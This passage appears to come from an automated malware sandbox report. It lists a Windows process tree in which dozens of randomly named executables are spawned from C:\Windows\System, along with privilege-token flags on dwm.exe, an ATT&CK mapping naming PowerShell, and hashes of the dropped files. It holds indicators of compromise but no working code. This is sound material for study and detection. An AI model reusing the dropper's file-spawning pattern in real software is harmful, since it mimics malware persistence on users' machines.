- C:\Windows\System\aWNBTJU.exe
  C:\Windows\System\aWNBTJU.exe
  2⤵
  PID:12524
- C:\Windows\System\DdihPZA.exe
  C:\Windows\System\DdihPZA.exe
  2⤵
  PID:12548
- C:\Windows\System\HnTXiim.exe
  C:\Windows\System\HnTXiim.exe
  2⤵
  PID:12564
- C:\Windows\System\AIygMDl.exe
  C:\Windows\System\AIygMDl.exe
  2⤵
  PID:12580
- C:\Windows\System\RsHqFUj.exe
  C:\Windows\System\RsHqFUj.exe
  2⤵
  PID:12600
- C:\Windows\System\bcgDOsy.exe
  C:\Windows\System\bcgDOsy.exe
  2⤵
  PID:12616
- C:\Windows\System\ExnHZFg.exe
  C:\Windows\System\ExnHZFg.exe
  2⤵
  PID:12632
- C:\Windows\System\oiSdRsN.exe
  C:\Windows\System\oiSdRsN.exe
  2⤵
  PID:12648
- C:\Windows\System\iQAtoWL.exe
  C:\Windows\System\iQAtoWL.exe
  2⤵
  PID:12664
- C:\Windows\System\zUpokTX.exe
  C:\Windows\System\zUpokTX.exe
  2⤵
  PID:12680
- C:\Windows\System\XyBNTqT.exe
  C:\Windows\System\XyBNTqT.exe
  2⤵
  PID:12704
- C:\Windows\System\FdnzKoE.exe
  C:\Windows\System\FdnzKoE.exe
  2⤵
  PID:12728
- C:\Windows\System\DIdHnek.exe
  C:\Windows\System\DIdHnek.exe
  2⤵
  PID:12748
- C:\Windows\System\vOwdIWE.exe
  C:\Windows\System\vOwdIWE.exe
  2⤵
  PID:12768
- C:\Windows\System\NEUegrN.exe
  C:\Windows\System\NEUegrN.exe
  2⤵
  PID:12788
- C:\Windows\System\CWmdnbr.exe
  C:\Windows\System\CWmdnbr.exe
  2⤵
  PID:12808
- C:\Windows\System\ajHHDxD.exe
  C:\Windows\System\ajHHDxD.exe
  2⤵
  PID:12824
- C:\Windows\System\FASvEbl.exe
  C:\Windows\System\FASvEbl.exe
  2⤵
  PID:12856
- C:\Windows\System\jXUUbnu.exe
  C:\Windows\System\jXUUbnu.exe
  2⤵
  PID:12872
- C:\Windows\System\lPSLWEp.exe
  C:\Windows\System\lPSLWEp.exe
  2⤵
  PID:12892
- C:\Windows\System\yhKIYke.exe
  C:\Windows\System\yhKIYke.exe
  2⤵
  PID:12912
- C:\Windows\System\BxDGrus.exe
  C:\Windows\System\BxDGrus.exe
  2⤵
  PID:12936
- C:\Windows\System\yKlUqna.exe
  C:\Windows\System\yKlUqna.exe
  2⤵
  PID:12956
- C:\Windows\System\CMCCzGL.exe
  C:\Windows\System\CMCCzGL.exe
  2⤵
  PID:12980
- C:\Windows\System\eyEODDs.exe
  C:\Windows\System\eyEODDs.exe
  2⤵
  PID:13004
- C:\Windows\System\qfwYrMy.exe
  C:\Windows\System\qfwYrMy.exe
  2⤵
  PID:13028
- C:\Windows\System\OHJmyvw.exe
  C:\Windows\System\OHJmyvw.exe
  2⤵
  PID:13056
- C:\Windows\System\EfMFmTN.exe
  C:\Windows\System\EfMFmTN.exe
  2⤵
  PID:13076
- C:\Windows\System\QitzHww.exe
  C:\Windows\System\QitzHww.exe
  2⤵
  PID:13100
- C:\Windows\System\QEPVMxj.exe
  C:\Windows\System\QEPVMxj.exe
  2⤵
  PID:13120
- C:\Windows\System\bnbSPJS.exe
  C:\Windows\System\bnbSPJS.exe
  2⤵
  PID:13140
- C:\Windows\System\gLhZMif.exe
  C:\Windows\System\gLhZMif.exe
  2⤵
  PID:13164
- C:\Windows\System\VGwJFoC.exe
  C:\Windows\System\VGwJFoC.exe
  2⤵
  PID:9176
- C:\Windows\System\PeUKiXJ.exe
  C:\Windows\System\PeUKiXJ.exe
  2⤵
  PID:10296
- C:\Windows\System\LgiSQFF.exe
  C:\Windows\System\LgiSQFF.exe
  2⤵
  PID:1412
- C:\Windows\System\EuDJqpu.exe
  C:\Windows\System\EuDJqpu.exe
  2⤵
  PID:10432
- C:\Windows\System\CQdEcbG.exe
  C:\Windows\System\CQdEcbG.exe
  2⤵
  PID:10428
- C:\Windows\System\kGNhYGR.exe
  C:\Windows\System\kGNhYGR.exe
  2⤵
  PID:10536
- C:\Windows\System\QPXPEZn.exe
  C:\Windows\System\QPXPEZn.exe
  2⤵
  PID:10648
- C:\Windows\System\bYHECuz.exe
  C:\Windows\System\bYHECuz.exe
  2⤵
  PID:10728
- C:\Windows\System\pAcNLjk.exe
  C:\Windows\System\pAcNLjk.exe
  2⤵
  PID:10856
- C:\Windows\System\bzcoOFO.exe
  C:\Windows\System\bzcoOFO.exe
  2⤵
  PID:10920
- C:\Windows\System\dJRuOud.exe
  C:\Windows\System\dJRuOud.exe
  2⤵
  PID:9908
- C:\Windows\System\foNNtGv.exe
  C:\Windows\System\foNNtGv.exe
  2⤵
  PID:11996
- C:\Windows\System\QwxHuJg.exe
  C:\Windows\System\QwxHuJg.exe
  2⤵
  PID:12020
- C:\Windows\System\JAfGrXJ.exe
  C:\Windows\System\JAfGrXJ.exe
  2⤵
  PID:12060
- C:\Windows\System\emWwKUP.exe
  C:\Windows\System\emWwKUP.exe
  2⤵
  PID:12100
- C:\Windows\System\NXCtWyo.exe
  C:\Windows\System\NXCtWyo.exe
  2⤵
  PID:12136
- C:\Windows\System\njxEygF.exe
  C:\Windows\System\njxEygF.exe
  2⤵
  PID:12188
- C:\Windows\System\BMVFspk.exe
  C:\Windows\System\BMVFspk.exe
  2⤵
  PID:12776
- C:\Windows\System\eDkmNbL.exe
  C:\Windows\System\eDkmNbL.exe
  2⤵
  PID:13000
- C:\Windows\System\cCwTTal.exe
  C:\Windows\System\cCwTTal.exe
  2⤵
  PID:13212
- C:\Windows\System\FxFWWDx.exe
  C:\Windows\System\FxFWWDx.exe
  2⤵
  PID:4180
- C:\Windows\System\zTQWMzI.exe
  C:\Windows\System\zTQWMzI.exe
  2⤵
  PID:11724
- C:\Windows\System\esxLKDg.exe
  C:\Windows\System\esxLKDg.exe
  2⤵
  PID:8364
- C:\Windows\System\QTlNnXM.exe
  C:\Windows\System\QTlNnXM.exe
  2⤵
  PID:11048
- C:\Windows\System\Eysvirm.exe
  C:\Windows\System\Eysvirm.exe
  2⤵
  PID:11260
- C:\Windows\System\OqfdFOY.exe
  C:\Windows\System\OqfdFOY.exe
  2⤵
  PID:12908
- C:\Windows\System\AYDtTyk.exe
  C:\Windows\System\AYDtTyk.exe
  2⤵
  PID:11608
- C:\Windows\System\cnazEOT.exe
  C:\Windows\System\cnazEOT.exe
  2⤵
  PID:9492
- C:\Windows\System\dmVEzpl.exe
  C:\Windows\System\dmVEzpl.exe
  2⤵
  PID:12736
- C:\Windows\System\yeFhKKd.exe
  C:\Windows\System\yeFhKKd.exe
  2⤵
  PID:10916
- C:\Windows\System\duKmIiA.exe
  C:\Windows\System\duKmIiA.exe
  2⤵
  PID:10480
- C:\Windows\System\HCtswtB.exe
  C:\Windows\System\HCtswtB.exe
  2⤵
  PID:10556
- C:\Windows\System\MgvSlIo.exe
  C:\Windows\System\MgvSlIo.exe
  2⤵
  PID:10820
- C:\Windows\System\bOMIcki.exe
  C:\Windows\System\bOMIcki.exe
  2⤵
  PID:11216
- C:\Windows\System\OEaaRwL.exe
  C:\Windows\System\OEaaRwL.exe
  2⤵
  PID:11468
- C:\Windows\System\qtaeDNQ.exe
  C:\Windows\System\qtaeDNQ.exe
  2⤵
  PID:8864
- C:\Windows\System\OHMHbzl.exe
  C:\Windows\System\OHMHbzl.exe
  2⤵
  PID:12948
- C:\Windows\System\KnNPLst.exe
  C:\Windows\System\KnNPLst.exe
  2⤵
  PID:4584
- C:\Windows\System\JePVzWF.exe
  C:\Windows\System\JePVzWF.exe
  2⤵
  PID:8344
- C:\Windows\System\uGjZBDr.exe
  C:\Windows\System\uGjZBDr.exe
  2⤵
  PID:11900
- C:\Windows\System\DepZiJx.exe
  C:\Windows\System\DepZiJx.exe
  2⤵
  PID:9160
- C:\Windows\System\ELrGYXK.exe
  C:\Windows\System\ELrGYXK.exe
  2⤵
  PID:7812
- C:\Windows\System\hwxfmvh.exe
  C:\Windows\System\hwxfmvh.exe
  2⤵
  PID:11828
- C:\Windows\System\YBCJfWf.exe
  C:\Windows\System\YBCJfWf.exe
  2⤵
  PID:13320
- C:\Windows\System\mUtBqtH.exe
  C:\Windows\System\mUtBqtH.exe
  2⤵
  PID:13400
- C:\Windows\System\BnfqfBu.exe
  C:\Windows\System\BnfqfBu.exe
  2⤵
  PID:13812
- C:\Windows\System\DDFloRp.exe
  C:\Windows\System\DDFloRp.exe
  2⤵
  PID:14044
- C:\Windows\System\IqhYWCR.exe
  C:\Windows\System\IqhYWCR.exe
  2⤵
  PID:14064
- C:\Windows\System\tHwXhqu.exe
  C:\Windows\System\tHwXhqu.exe
  2⤵
  PID:14088
- C:\Windows\System\WNLyLJU.exe
  C:\Windows\System\WNLyLJU.exe
  2⤵
  PID:14116
- C:\Windows\System\IZTdCya.exe
  C:\Windows\System\IZTdCya.exe
  2⤵
  PID:14140
- C:\Windows\System\dQAlBzt.exe
  C:\Windows\System\dQAlBzt.exe
  2⤵
  PID:14160
- C:\Windows\System\MkOrcik.exe
  C:\Windows\System\MkOrcik.exe
  2⤵
  PID:14184
- C:\Windows\System\dksSuEm.exe
  C:\Windows\System\dksSuEm.exe
  2⤵
  PID:14200
- C:\Windows\System\trBEHGZ.exe
  C:\Windows\System\trBEHGZ.exe
  2⤵
  PID:14224
- C:\Windows\System\zTDoIbM.exe
  C:\Windows\System\zTDoIbM.exe
  2⤵
  PID:14244
- C:\Windows\System\MvtKIZb.exe
  C:\Windows\System\MvtKIZb.exe
  2⤵
  PID:14268
- C:\Windows\System\VCWzfma.exe
  C:\Windows\System\VCWzfma.exe
  2⤵
  PID:14296
- C:\Windows\System\CKYMGEE.exe
  C:\Windows\System\CKYMGEE.exe
  2⤵
  PID:12016
- C:\Windows\System\czxJpmj.exe
  C:\Windows\System\czxJpmj.exe
  2⤵
  PID:8520
- C:\Windows\System\jFVnAlz.exe
  C:\Windows\System\jFVnAlz.exe
  2⤵
  PID:7532
- C:\Windows\System\FxKtoqG.exe
  C:\Windows\System\FxKtoqG.exe
  2⤵
  PID:10416
- C:\Windows\System\ihZJHJq.exe
  C:\Windows\System\ihZJHJq.exe
  2⤵
  PID:12236
- C:\Windows\System\ZydOvCz.exe
  C:\Windows\System\ZydOvCz.exe
  2⤵
  PID:10928
- C:\Windows\System\OffKWKZ.exe
  C:\Windows\System\OffKWKZ.exe
  2⤵
  PID:13020
- C:\Windows\System\aVruaLg.exe
  C:\Windows\System\aVruaLg.exe
  2⤵
  PID:6272
- C:\Windows\System\eABWrBV.exe
  C:\Windows\System\eABWrBV.exe
  2⤵
  PID:9108
- C:\Windows\System\tLjPfjf.exe
  C:\Windows\System\tLjPfjf.exe
  2⤵
  PID:13352
- C:\Windows\System\MnBuVdy.exe
  C:\Windows\System\MnBuVdy.exe
  2⤵
  PID:11084
- C:\Windows\System\IfSUnBk.exe
  C:\Windows\System\IfSUnBk.exe
  2⤵
  PID:9360
- C:\Windows\System\OfvCIcc.exe
  C:\Windows\System\OfvCIcc.exe
  2⤵
  PID:12628
- C:\Windows\System\YlVVfyO.exe
  C:\Windows\System\YlVVfyO.exe
  2⤵
  PID:13604
- C:\Windows\System\ouAtzKB.exe
  C:\Windows\System\ouAtzKB.exe
  2⤵
  PID:12560
- C:\Windows\System\hxNqqHU.exe
  C:\Windows\System\hxNqqHU.exe
  2⤵
  PID:10092
- C:\Windows\System\BowjfcP.exe
  C:\Windows\System\BowjfcP.exe
  2⤵
  PID:13496
- C:\Windows\System\WtCSrbf.exe
  C:\Windows\System\WtCSrbf.exe
  2⤵
  PID:13648
- C:\Windows\System\PaJoehh.exe
  C:\Windows\System\PaJoehh.exe
  2⤵
  PID:4016
- C:\Windows\System\vovDLGS.exe
  C:\Windows\System\vovDLGS.exe
  2⤵
  PID:12348
- C:\Windows\System\zvTtWTY.exe
  C:\Windows\System\zvTtWTY.exe
  2⤵
  PID:12712
- C:\Windows\System\pncMiTa.exe
  C:\Windows\System\pncMiTa.exe
  2⤵
  PID:13424
- C:\Windows\System\IALQjGa.exe
  C:\Windows\System\IALQjGa.exe
  2⤵
  PID:2908
- C:\Windows\System\mtJGdNK.exe
  C:\Windows\System\mtJGdNK.exe
  2⤵
  PID:13552
- C:\Windows\System\WwQHBdJ.exe
  C:\Windows\System\WwQHBdJ.exe
  2⤵
  PID:14072
- C:\Windows\System\NHFAWFL.exe
  C:\Windows\System\NHFAWFL.exe
  2⤵
  PID:14080
- C:\Windows\System\KLItqCa.exe
  C:\Windows\System\KLItqCa.exe
  2⤵
  PID:9192
- C:\Windows\System\WyIAnIH.exe
  C:\Windows\System\WyIAnIH.exe
  2⤵
  PID:3260
- C:\Windows\System\KkWjazE.exe
  C:\Windows\System\KkWjazE.exe
  2⤵
  PID:12592
- C:\Windows\System\YZDzUye.exe
  C:\Windows\System\YZDzUye.exe
  2⤵
  PID:12460
- C:\Windows\System\xEVsiqW.exe
  C:\Windows\System\xEVsiqW.exe
  2⤵
  PID:14024
- C:\Windows\System\rgQKAiI.exe
  C:\Windows\System\rgQKAiI.exe
  2⤵
  PID:12988
- C:\Windows\System\ZbsafLh.exe
  C:\Windows\System\ZbsafLh.exe
  2⤵
  PID:7488
- C:\Windows\System\MQNVPNK.exe
  C:\Windows\System\MQNVPNK.exe
  2⤵
  PID:13412
- C:\Windows\System\DKgChsS.exe
  C:\Windows\System\DKgChsS.exe
  2⤵
  PID:11024
- C:\Windows\System\oHxBYMT.exe
  C:\Windows\System\oHxBYMT.exe
  2⤵
  PID:5016
- C:\Windows\System\gJOPNiB.exe
  C:\Windows\System\gJOPNiB.exe
  2⤵
  PID:11172
- C:\Windows\System\HiIvaXn.exe
  C:\Windows\System\HiIvaXn.exe
  2⤵
  PID:12820
- C:\Windows\System\XMzoTvk.exe
  C:\Windows\System\XMzoTvk.exe
  2⤵
  PID:11600
- C:\Windows\System\TvsSRoS.exe
  C:\Windows\System\TvsSRoS.exe
  2⤵
  PID:13560
- C:\Windows\System\TUCLTxB.exe
  C:\Windows\System\TUCLTxB.exe
  2⤵
  PID:13716
- C:\Windows\System\pgOPcSG.exe
  C:\Windows\System\pgOPcSG.exe
  2⤵
  PID:2244
- C:\Windows\System\YAGiYYC.exe
  C:\Windows\System\YAGiYYC.exe
  2⤵
  PID:7720
- C:\Windows\System\RFOZUuv.exe
  C:\Windows\System\RFOZUuv.exe
  2⤵
  PID:13916
- C:\Windows\System\csEJiSK.exe
  C:\Windows\System\csEJiSK.exe
  2⤵
  PID:372
- C:\Windows\System\oyyNSDB.exe
  C:\Windows\System\oyyNSDB.exe
  2⤵
  PID:11704
- C:\Windows\System\tmHpMxU.exe
  C:\Windows\System\tmHpMxU.exe
  2⤵
  PID:11564
- C:\Windows\System\ThhTMFc.exe
  C:\Windows\System\ThhTMFc.exe
  2⤵
  PID:14216
- C:\Windows\System\pUFtczW.exe
  C:\Windows\System\pUFtczW.exe
  2⤵
  PID:544
- C:\Windows\System\oylyhwu.exe
  C:\Windows\System\oylyhwu.exe
  2⤵
  PID:13528
- C:\Windows\System\wosIhke.exe
  C:\Windows\System\wosIhke.exe
  2⤵
  PID:13588
- C:\Windows\System\bMFKlPz.exe
  C:\Windows\System\bMFKlPz.exe
  2⤵
  PID:13960
- C:\Windows\System\nLipSLQ.exe
  C:\Windows\System\nLipSLQ.exe
  2⤵
  PID:14256
- C:\Windows\System\jkONCPy.exe
  C:\Windows\System\jkONCPy.exe
  2⤵
  PID:13804
- C:\Windows\System\PIxxmGT.exe
  C:\Windows\System\PIxxmGT.exe
  2⤵
  PID:12172
- C:\Windows\System\wzqTBFU.exe
  C:\Windows\System\wzqTBFU.exe
  2⤵
  PID:10516
- C:\Windows\System\oVOxlRs.exe
  C:\Windows\System\oVOxlRs.exe
  2⤵
  PID:1820
- C:\Windows\System\CqukHlw.exe
  C:\Windows\System\CqukHlw.exe
  2⤵
  PID:11192
- C:\Windows\System\ENdmUTt.exe
  C:\Windows\System\ENdmUTt.exe
  2⤵
  PID:14168
- C:\Windows\System\UThKOoy.exe
  C:\Windows\System\UThKOoy.exe
  2⤵
  PID:14056
- C:\Windows\System\vARGSSH.exe
  C:\Windows\System\vARGSSH.exe
  2⤵
  PID:14032
- C:\Windows\System\MJGUfgO.exe
  C:\Windows\System\MJGUfgO.exe
  2⤵
  PID:9984
- C:\Windows\System\ZKsTMeM.exe
  C:\Windows\System\ZKsTMeM.exe
  2⤵
  PID:12124
- C:\Windows\System\xTQhOxz.exe
  C:\Windows\System\xTQhOxz.exe
  2⤵
  PID:12076
- C:\Windows\System\WzNiAMR.exe
  C:\Windows\System\WzNiAMR.exe
  2⤵
  PID:14332
- C:\Windows\System\CDsYPtN.exe
  C:\Windows\System\CDsYPtN.exe
  2⤵
  PID:14196
- C:\Windows\System\EHZacfF.exe
  C:\Windows\System\EHZacfF.exe
  2⤵
  PID:4452
- C:\Windows\System\cGmuRry.exe
  C:\Windows\System\cGmuRry.exe
  2⤵
  PID:3740
- C:\Windows\System\QKCUocO.exe
  C:\Windows\System\QKCUocO.exe
  2⤵
  PID:1612
- C:\Windows\System\kkgPEzc.exe
  C:\Windows\System\kkgPEzc.exe
  2⤵
  PID:4612
- C:\Windows\System\NNLafVd.exe
  C:\Windows\System\NNLafVd.exe
  2⤵
  PID:13092
- C:\Windows\System\OQrfcww.exe
  C:\Windows\System\OQrfcww.exe
  2⤵
  PID:10456
- C:\Windows\System\IGNvCwm.exe
  C:\Windows\System\IGNvCwm.exe
  2⤵
  PID:12884
- C:\Windows\System\CyGXpRf.exe
  C:\Windows\System\CyGXpRf.exe
  2⤵
  PID:12492
- C:\Windows\System\MiotQgN.exe
  C:\Windows\System\MiotQgN.exe
  2⤵
  PID:8816
- C:\Windows\System\pcvKJos.exe
  C:\Windows\System\pcvKJos.exe
  2⤵
  PID:12764
- C:\Windows\System\sVNLnjO.exe
  C:\Windows\System\sVNLnjO.exe
  2⤵
  PID:9788
- C:\Windows\System\hCMKeMg.exe
  C:\Windows\System\hCMKeMg.exe
  2⤵
  PID:3004
- C:\Windows\System\SzPPRQi.exe
  C:\Windows\System\SzPPRQi.exe
  2⤵
  PID:2576
- C:\Windows\System\DWaUorz.exe
  C:\Windows\System\DWaUorz.exe
  2⤵
  PID:10384
- C:\Windows\System\PLMzdkp.exe
  C:\Windows\System\PLMzdkp.exe
  2⤵
  PID:8076
- C:\Windows\System\vfTshfD.exe
  C:\Windows\System\vfTshfD.exe
  2⤵
  PID:872
- C:\Windows\System\TZqVLzj.exe
  C:\Windows\System\TZqVLzj.exe
  2⤵
  PID:12836
- C:\Windows\System\LYFtKaJ.exe
  C:\Windows\System\LYFtKaJ.exe
  2⤵
  PID:2260
- C:\Windows\System\hyqHvyH.exe
  C:\Windows\System\hyqHvyH.exe
  2⤵
  PID:936
- C:\Windows\System\nELKrUU.exe
  C:\Windows\System\nELKrUU.exe
  2⤵
  PID:14252
- C:\Windows\System\emSZClC.exe
  C:\Windows\System\emSZClC.exe
  2⤵
  PID:12520
- C:\Windows\System\ViKwLuj.exe
  C:\Windows\System\ViKwLuj.exe
  2⤵
  PID:10324
- C:\Windows\System\gxVcoWU.exe
  C:\Windows\System\gxVcoWU.exe
  2⤵
  PID:12976
- C:\Windows\System\eGHTKsh.exe
  C:\Windows\System\eGHTKsh.exe
  2⤵
  PID:2184

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:12132

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4456

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:13644

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:1044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ev4411b.a3u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System\BZTgRTf.exe

Filesize
1.6MB

MD5
ca74cf06758e17c9a215662d5a560aeb

SHA1
c38eda5843d22482152e02de6dcf493942392be0

SHA256
05b6b0a408654d4fcd8ba11ca0334e4523735459bb47593bc15599c6f69d2427

SHA512
4c5c7c66156d1e31fd2286ee47f5748a8245a76c2ac4b739202610cdc7891228d8cab27d54c27d0fdbef685a6fa6fed48f4c9abb63f514512640ac73d14eff12

Download Submit
C:\Windows\System\BgbOqFC.exe

Filesize
1.6MB

MD5
dadb31f488cf813a66abadd72d00c734

SHA1
9572687dbe00dd5c5a73f5d8e41f50edfed5df01

SHA256
396b08e616876bfa72eb2460a0e5806dfd4c521ab606bad832f185f3c3587ea2

SHA512
ab9cdba436f6d91d1d0a3fb0e8a8bab1218586c620efb521699cb8bdf7ddb16c8deda428e17298db725835325abeac83e07f83372ec2d38d1607f3496ae6cc59

Download Submit
C:\Windows\System\DsvyXvb.exe

Filesize
1.6MB

MD5
c49d5a950c90c6498c6bbf62616b711e

SHA1
cb3161de160a50a32c7a552c10df83b614c2d796

SHA256
5a5985b304f724e7d354fcfc825a94d10fe611a65ab10a196ee221035d401f14

SHA512
430e0dec608f4f75d6289dacb959e9c07fdea5d61ca7ab184370cbf57954623dbcd3a604877c36258431fc5eb59f1740ed35491e5492f972ea009b35a3e5ea56

Download Submit
C:\Windows\System\EFuXeiE.exe

Filesize
1.6MB

MD5
dbe50c25039b3ff5ca816f2e90a18124

SHA1
c7a7404f3c138d487a47b2b17821ccfb141af468

SHA256
38d9cc41b7c302934a89af5f01bbd6319f56057ea57a54fcd571aca3063203f1

SHA512
b73927bea331f78486dfbb182c1d425deca2970c539ec76b7373a178bc6f60d48f4ebc6467700cd90fb117f411550b3a9ce568dacc287175af4a6e95dedb46a3

Download Submit
C:\Windows\System\HyaRfxy.exe

Filesize
1.6MB

MD5
c5efa83057571744a473853c9b7b35b6

SHA1
c361847f8de3adc32250ea8bf767f7bb111afa4f

SHA256
cce089da2773ddd9639459a3892450dbba647fee0e55ae57bba83fa94ad8ce2d

SHA512
663dcd53aa67d542c53af1497045577a1324aea5278fc149b2890f9765a732afb4bc0cc95decc5e217bb079c0ff6406790609cbd1e45cde46b3d572266d3c985

Download Submit
C:\Windows\System\KGyfZQa.exe

Filesize
1.6MB

MD5
1ac79a9b73fa578b583f79a3499ca9cc

SHA1
e869ad374b20a739a717b5e8be9530815d3caf66

SHA256
8d2a61d8642e54be537e531f54503d491b33087ccc8ac9a98eb0d0e2f57daf8e

SHA512
d173c3c86acc41da2b9d4d10117dc925491bfd83b139f87dd209d55bf6d39bf99dde57e5ee47a14468f5b59e183097111516d5bec50431130fa83555b10d7e27

Download Submit
C:\Windows\System\KTGlVSn.exe

Filesize
1.6MB

MD5
71a71a9db643979e6b799a213c1a88b0

SHA1
b3321b8bbfa5eb87887385ac9ca3fc9178cf52e1

SHA256
b385d668cfcff632a8e525351e300fc5f9d140b54fedbde595c2ef144bbb253b

SHA512
858589ee20f1d01b7f699f2282f1655fa628a41d0b983554d04ad51131df9fe93b3eb40880eca57eadd5264d0b6beb19e6a51428fd4fc46604043ce4eb695d9c

Download Submit
C:\Windows\System\MnjaMhU.exe

Filesize
1.6MB

MD5
323b4d6c5cc1346eefccde027feaba5d

SHA1
cee5d2a0652e149c72b48b9ce47f72e00acbf23a

SHA256
b82cc20059bab4b75073339ac29488e28d024fae657e4b7d977787aaafb9fe7a

SHA512
f8cef8b2b1fbde5be1475dac864601604d56b77d798b513f30e42464420f6593dfd80fe6161b87e9ee2725b1d475bb4cee94b2a684576a2b89d31002038bb08e

Download Submit
C:\Windows\System\PCSfkNJ.exe

Filesize
1.6MB

MD5
872e863b15d57178d6673fd76766b588

SHA1
0c3b382c387e10577097cbc69f759783dcc8ec1c

SHA256
fec8e3a632d3645b26d27a87e148f52a9ee3066b5823748dd286f3467f31a6b3

SHA512
b6c46f790ca04a8450514be795ee337a96bc08c82b33e093f86a56a8c79e6632e6963706dcb60c7d523c722f6c182c00eba22864bc229622cc8f9459a30ca694

Download Submit
C:\Windows\System\PrbTwWR.exe

Filesize
1.6MB

MD5
7ff6e13128f440140277d3b49481c52a

SHA1
d76763e0a16de30e829bba8073c0bf3ab787872a

SHA256
780d89a922e53d381bf47a4bfa80439d6e8f875df861714f051b0495c84f2f21

SHA512
f248dd60f1226e4874d14e49146051a0ea3166b6ad641cff922c858c3bcbe15b4fa94038845a48db457a98ec4d3b46e332661ee32edeb42c72b929307e43fc20

Download Submit
C:\Windows\System\RCNMRwD.exe

Filesize
1.6MB

MD5
4d31a7f8cc5cd274ea0beeb24eb46795

SHA1
06c6001e0a49698d7b442a8159011e3753559b16

SHA256
0003994ce2b7f827c28db60160f958783badc44c7015327de0282258d48bc483

SHA512
89a4a9dbcba5fbbfcfcc6bf4b151e1d4a4f1b46751782ed34583596d5a041f78df50ef570578e447e9df508256ff720433f232e13d36357ece789a5185120137

Download Submit
C:\Windows\System\SFcTSrS.exe

Filesize
1.6MB

MD5
5f588ade88abdf7d61fd60cbd68e2c16

SHA1
ba9b35f7e41e97f0d85eeb5e4804a5b2a0699f0b

SHA256
c64dec815ca95349bf4586c3bfbd9134da161b1ca4f9c4e609f38af49c8b7787

SHA512
95d0a1d15e1c1fd31612b1d4ae4dad2918abcde87f974f2d475b0103e31109b9c5a699017b212e0e7f12c893a1f8e6fd2115b265209073b7f0ea1ba8c725a185

Download Submit
C:\Windows\System\TfhAgvF.exe

Filesize
1.6MB

MD5
23c91fd7ce3f56165198b426e3df5e06

SHA1
bfa0e83517e412d05615acd84e0a24150ae1b357

SHA256
f42c77341ece8ee9f837b33804b045dc78cf34e628b29573ca2cc537774e3890

SHA512
992afde3f7f71ca704ba3f9231735744d2cefcee6b4779931bbe468979c018f6d06a85fe9d9b4b3cb6533be2e2139d543af02f7dfafcb6e209709848de2a4f96

Download Submit
C:\Windows\System\WOMYVKx.exe

Filesize
1.6MB

MD5
9d50be9da841222f7025c926578e69e3

SHA1
b89405c6d851fefd8cd1a48fe0f9dd66077d7952

SHA256
c8eaea1efc1ef5e506212f9b46121c43035e9c4a75d274373105ac8b6022d9d9

SHA512
cc107e9f031cde9df992abafe52bd38d19e8effbcb93d59185de2719930f9edd70426181ddf8930fd13ef11b9693d1df5d997b0d08db71b29fd67af956f47b99

Download Submit
C:\Windows\System\WtgUGJf.exe

Filesize
1.6MB

MD5
8e95f758638611283432d543bb4987ac

SHA1
185bb07521c86afd044f5af360e2ac65a7315047

SHA256
9b9fe62d25f52137078247d761f666047d4f498c96841bfe25e0d1d3e51aa209

SHA512
2bba4f0899fcbcea69a65bac1f4e16016a027459925ea2f833bbf6ea6e9fbcf777976fd6e4eebc7cd9e121635c29dae53a76fac2e7c105dcfdb6e44d1b8b6ae7

Download Submit
C:\Windows\System\XdYKKLp.exe

Filesize
1.1MB

MD5
fc2f1b8ae52eec71e67d9b1d8f0b43ed

SHA1
db9c273e9667d709d85a2d972a4f02c16707f45d

SHA256
e3669dae5fc18814bf493a704b4e94cdc0d18eede130655362514ecfd4521236

SHA512
008aaac8e4390da9affe21219f82922f954636a7c4cae984a0050c1283c6248cd192f14e0de927e9ae2632fdcd5fde31dd6b3df228c39b87fd2c0718398cea72

Download Submit
C:\Windows\System\XdYKKLp.exe

Filesize
1.6MB

MD5
7a18b25610200d2e1e02ee83d4f570c2

SHA1
cbe34364dd55ebb81fef5f33000de40d2b3ffc75

SHA256
2dc3a51485a0d9b3b7eb3263ac0c05e8f60559965016f3a3731e1b1e8c473067

SHA512
f6e54f2c49d24287b423667eb84faefa403b625f88171c04c7213f5cbeee87d1c8832fced97a7928ae1b42ddd3ca272d5afc17621908451cf4bb60f1a5fb314f

Download Submit
C:\Windows\System\ZCdlYUT.exe

Filesize
1.6MB

MD5
b11db1cf129422b372af8c10bd3a05ce

SHA1
43c4f0bd11918236b60987c625493daea62bfff5

SHA256
80d1fe88f76c2a2671855988eadd38fd65b440563b2db6dab4d64ad38178728e

SHA512
82d2b47a6d4a1475b0b6db2c6d39c9eefdcac47b30726ff3e918783f1b5ff188ed4f9c21fefcb09dc0ea90c45cb4c817813476d4e8c10b9349d69add64edae79

Download Submit
C:\Windows\System\ZblOJuK.exe

Filesize
1.6MB

MD5
7f38172ea8692c5fbfd124d83cfccfef

SHA1
06d365a953cd469e46742a076c5eabd8aee1ce2b

SHA256
6312701bf010327a600efac963f5e3813e3e37ed9bf41aa5a08611e7aac26316

SHA512
98851044a2899899546197bd8b83a3cdfa438c5865b0a876259efd19d492885ceeb14ffb6145a41f27353fe99e7c0ee90a20ef0f6ceb3c994fa51f8719da2d3f

Download Submit
C:\Windows\System\ZeGWtYI.exe

Filesize
1.6MB

MD5
05b6ad33fdc3f213e50c45ccd510476f

SHA1
08389cb111af805e67c2a0ee7c6cb6d87e2381ec

SHA256
49f9cb3e25537d2b6a4596b4399255c8d2bd6137873330591edeecb613a05397

SHA512
aa504719c3b4c47d273f8fd76ddca5831dd4bcd4a0c53c51c301612231dc8a29b245e894f6c0704a9767f269ab9ec5ec0a8699562864b4d330b27240049d4478

Download Submit
